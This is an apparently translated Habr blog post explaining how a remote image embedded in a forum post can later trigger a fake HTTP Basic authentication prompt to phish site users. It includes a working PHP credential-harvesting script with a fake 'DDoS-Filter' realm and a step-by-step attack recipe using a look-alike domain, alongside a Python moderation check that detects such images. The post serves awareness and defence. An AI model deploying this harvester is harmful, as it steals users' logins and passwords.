
Evil Phishing Pictures

As the saying goes: "Everything new is well-forgotten old."

Allowing remote resources (for example, images from other sites) to be embedded in the pages of your site is a very bad practice, one that may at some point lead to quite serious consequences for the site. Ten years ago I was surprised to read that this was possible. Now ten years have passed, nothing has changed, and it seems unlikely that it ever will.

Details under the cut

Theory and practice


1. A hacker (an evil user) registers a domain whose spelling resembles the attacked domain.
2. Uploads to it a PHP script with the following content:
<?php
if (!isset($_SERVER['PHP_AUTH_USER'])) {
    // Take the host of the page that embedded the picture, to name the realm after it.
    // PHP exposes the Referer header as HTTP_REFERER (the original had REFERER, which is never set).
    $vulnsite = parse_url($_SERVER['HTTP_REFERER']);
    // These three headers stay commented out until the post reaches the main page (see step 6).
    //header('Content-Type: text/html; charset=windows-1251');
    //header('WWW-Authenticate: Basic realm="'.ucfirst($vulnsite['host']).' DDoS-Filter: Enter your Login and Password"');
    //header('HTTP/1.0 401 Unauthorized');
} else {
    // The browser sent credentials: append them to a file.
    $f = fopen('passes.txt', 'a');
    fwrite($f, $_SERVER['PHP_AUTH_USER'].';'.$_SERVER['PHP_AUTH_PW']."\r\n");
    fclose($f);
}
// In every case a real picture is returned, so the request looks like an ordinary image load.
header("Content-type: image/jpeg");
$image = imagecreatefromjpeg('image.jpg');
imagejpeg($image);
imagedestroy($image);
exit();
// image.jpg // superphoto.jpg
?>


3. Writes an article and embeds the picture in the post:

<img src="http://exEmple.com/evilimage.php" alt="image"/>

4. If the site has moderation, submits the article for moderation.
5. Suppose the article turns out well for him and it reaches the main page.
6. The evil person sees his brainchild on the main page and uncomments the lines in the PHP code. Now, in response to the request for the picture from the post, every user gets an authorization dialog in the browser, and anything can be written in it, for example that the site is fighting off a DDoS attack and asks you to re-enter your login and password.
7. An inattentive user does not read the domain name shown in the authorization dialog and submits their login and password.
8. The evil person gets your username and password; his goal is reached.
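One moderation-side check against the trick described in the steps above, as an added example that is not part of the original post: before a submitted post is published, every remote <img src> is fetched server-side and rejected if the response demands authentication, is not a 200, or is not a genuine image whose sniffed type matches the declared Content-Type. The HTTP client is injected, and the responses below are constructed stand-ins (the evilimage.php URL from the post, plus assumed hosts under example.org) so the script runs offline.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, Tuple

# Magic bytes of the image formats the site is willing to embed.
IMAGE_MAGIC = {b"\xff\xd8\xff": "image/jpeg", b"\x89PNG\r\n\x1a\n": "image/png",
               b"GIF87a": "image/gif", b"GIF89a": "image/gif"}

@dataclass
class Fetched:               # what the moderation fetcher got back for one URL
    status: int
    headers: Dict[str, str]  # header names lower-cased
    body: bytes

def check_image_url(url: str, fetch: Callable[[str], Fetched]) -> Tuple[bool, str]:
    """Return (ok, reason). Only a 200 whose declared and sniffed type agree passes."""
    resp = fetch(url)
    if "www-authenticate" in resp.headers:
        return False, "server demands authentication"  # the trick described in the post
    if resp.status != 200:
        return False, f"status {resp.status}"
    ctype = resp.headers.get("content-type", "").split(";")[0].strip().lower()
    sniffed = next((t for m, t in IMAGE_MAGIC.items() if resp.body.startswith(m)), None)
    if sniffed is None:
        return False, "body is not a recognised image"
    if ctype != sniffed:
        return False, f"declared {ctype} but body is {sniffed}"
    return True, sniffed
IMG_SRC = re.compile(r'<img\b[^>]*\bsrc=["\']([^"\']+)["\']', re.IGNORECASE)

def audit_post_html(html: str, fetch: Callable[[str], Fetched]) -> Dict[str, Tuple[bool, str]]:
    """Check every <img src> in a submitted post before it is published."""
    return {url: check_image_url(url, fetch) for url in IMG_SRC.findall(html)}

# Constructed responses standing in for a real HTTP client, so this runs offline.
CONSTRUCTED = {
    "http://exEmple.com/evilimage.php": Fetched(
        401, {"www-authenticate": 'Basic realm="Example.com DDoS-Filter"'}, b""),
    "https://cdn.example.org/photo.jpg": Fetched(
        200, {"content-type": "image/jpeg"}, b"\xff\xd8\xff\xe0" + b"\x00" * 12),
    "https://cdn.example.org/fake.png": Fetched(
        200, {"content-type": "image/png"}, b"<html>not an image</html>"),
}
def constructed_fetch(url: str) -> Fetched:
    return CONSTRUCTED.get(url, Fetched(404, {}, b""))

if __name__ == "__main__":
    html = "".join(f'<img src="{u}" alt="x"/>' for u in CONSTRUCTED)
    for url, verdict in audit_post_html(html, constructed_fetch).items():
        print(url, verdict)
```

In production the fetch should also enforce a size limit and a timeout, and a post that fails the audit is better re-hosted through your own image proxy than published with the remote URL.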

Ways to protect


I think there are two sane methods:



PS

Habrahabr.ru is no exception here: on the main page there are posts with pictures from other resources. So you just need to keep this trick in mind and always check, letter by letter, the name of the domain that requires authorization.

And there is always the potential danger that, while a picture is on the main page, the site it is loaded from can be hacked simply in order to replace the picture with a script.

PPS

I do not think this is a bug.
It is nothing more than a trick that the HTTP protocol officially allows.

Source: https://habr.com/ru/post/140054/
